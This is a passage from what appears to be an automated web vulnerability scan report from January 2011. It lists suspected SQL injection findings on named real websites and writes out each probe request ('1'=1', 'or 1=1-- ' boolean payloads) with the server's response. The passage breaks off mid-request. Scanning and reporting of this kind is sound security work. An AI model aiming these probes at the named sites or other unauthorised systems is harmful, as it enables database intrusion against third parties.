<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.112. http://www.netlingo.com/tools/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/tools/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tools/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tools/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.113. http://www.netlingo.com/tools/online-store.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/tools/online-store.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tools/online-store.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tools/online-store.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 31808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.114. http://www.netlingo.com/tools/pocket-dictionary.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/tools/pocket-dictionary.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tools/pocket-dictionary.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tools/pocket-dictionary.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.115. http://www.netlingo.com/tools/search-browse-box.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/tools/search-browse-box.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tools/search-browse-box.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tools/search-browse-box.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 39716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.116. http://www.netlingo.com/tools/toolbar.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/tools/toolbar.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tools/toolbar.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tools/toolbar.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.117. http://www.netlingo.com/tools/widget.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/tools/widget.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tools/widget.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tools/widget.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.118. http://www.netlingo.com/top50/acronyms-for-parents.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/top50/acronyms-for-parents.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /top50/acronyms-for-parents.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /top50/acronyms-for-parents.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.119. http://www.netlingo.com/top50/business-text-terms.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/top50/business-text-terms.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /top50/business-text-terms.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /top50/business-text-terms.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.120. http://www.netlingo.com/top50/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/top50/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /top50/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /top50/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.121. http://www.netlingo.com/top50/newbie-terms.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/top50/newbie-terms.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /top50/newbie-terms.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /top50/newbie-terms.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.122. http://www.netlingo.com/top50/popular-text-terms.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/top50/popular-text-terms.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /top50/popular-text-terms.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /top50/popular-text-terms.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.123. http://www.netlingo.com/unsubscribe.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/unsubscribe.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /unsubscribe.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /unsubscribe.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.124. http://www.netlingo.com/word-of-the-day/feeds.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/word-of-the-day/feeds.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /word-of-the-day/feeds.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /word-of-the-day/feeds.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.125. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.networkworld.com
Path:	/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 20086312%20or%201%3d1--%20 and 20086312%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/201020086312%20or%201%3d1--%20/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:06:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div id="nww_footer">



       <style type="text/css">
       
</style>
   <div id="nww_footer_signup">
       <dl>
           <dt>
               Network World's Testing Guide to Microsoft's Top Products
               <span>View the results of our recent tests</span>
           </dt>
           <dd>
               <a href="http://www.accelacomm.com/jaw/nwwmtc_ftr_nw/7/51008142/">Download PDF</a>
           </dd>

       </dl>
</div>

   <!-- <div id="nww_footer_signup">
       <dl>
           <dt>
               Build your own newsletters with TechDispenser
               <span> Save time, stay informed, de-clutter your inbox</span>
           </dt>
           <dd>
           <form target="_blank" id="footerNLform" name="footerNLf
...[SNIP]...

Request 2

GET /news/201020086312%20or%201%3d2--%20/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:06:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div id="nww_footer">



<div id="nww_footer_signup">
       <dl>
           <dt style="margin-bottom:15px;">
               Network World's Daily Newsletter
               <span style="margin-top:15px; display:block;">Stay up to date with the most important tech news </span>
           </dt>
           <dd>
           <form target="new_window" id="footerNLform" name="footerNLform" method="get" action="http://www.networkworld.com/nl/nl_single_reg/daily-news.html?email=&source=nwwnla_nlt_ftr_mod2" onsubmit="openNewWindow()">
               
        
        <input type="hidden" value="nwwnla_nlt_ftr_mod" name="source"/>

               <button type="submit">Sign-up</button>
               
</form>
           </dd>
           <script type="text/javascript">
           $("form#footerNLform input#netflashinstantsignup").focus(function () {
       $(this).val("");
       });
   </script>
           
       </dl>
</div>

   <div id="nww_footer_nwwitems">
       <dl>
           <dt>
               Network World, Inc <a href="feed://www.networkworld.com/rss/netflash.xml"><img alt="RSS" src="/includes/styles/r08/img/ico-rss.gif"/></a>
               <span>The Connected Enterprise</span>
           </dt>
           <dd>
               <ul>
                   <li><a href="http://www.networkworld.com/aboutus/index.html" rel="nofollow">About Us</a></li>
                   <li><a href="http://www.networkworld.com/aboutus/careers.html" rel="nofollow">Jobs @ NWW</a></li>
                   <li><a href="http://www.networkworld.com/aboutus/index.html" rel="nofollow">Contact Us</a></li>
               </ul>
               <ul>
                   <li><a href="http://www.networkworld.com/newsletters/subscribe.html?k=nwwnla_ftr_link">Newsletter Subscriptions</a></li>
                   <li><a href="http://www.ne
...[SNIP]...

1.126. http://www.opensource.org/licenses/bsd-license.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/bsd-license.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /licenses'/bsd-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:09:24 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6sj2lur9a5t479v3d37vivubu3; expires=Thu, 17-Feb-2011 03:42:44 GMT; path=/; domain=.opensource.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
</strong> (PostgreSQL variant)
Submission: ...</p>
...[SNIP]...

1.127. http://www.opensource.org/licenses/bsd-license.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/bsd-license.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /licenses/bsd-license.php' HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:09:32 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=atds4ieat3ah6p2t9gs7kmoss4; expires=Thu, 17-Feb-2011 03:42:52 GMT; path=/; domain=.opensource.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
</strong> (PostgreSQL variant)
Submission: ...</p>
...[SNIP]...

1.128. http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.paperg.com
Path:	/flyerboard/soundings-publications-llc/2123/0.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 67864195%20or%201%3d1--%20 and 67864195%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/soundings-publications-llc/212367864195%20or%201%3d1--%20/0.html HTTP/1.1
Host: www.paperg.com
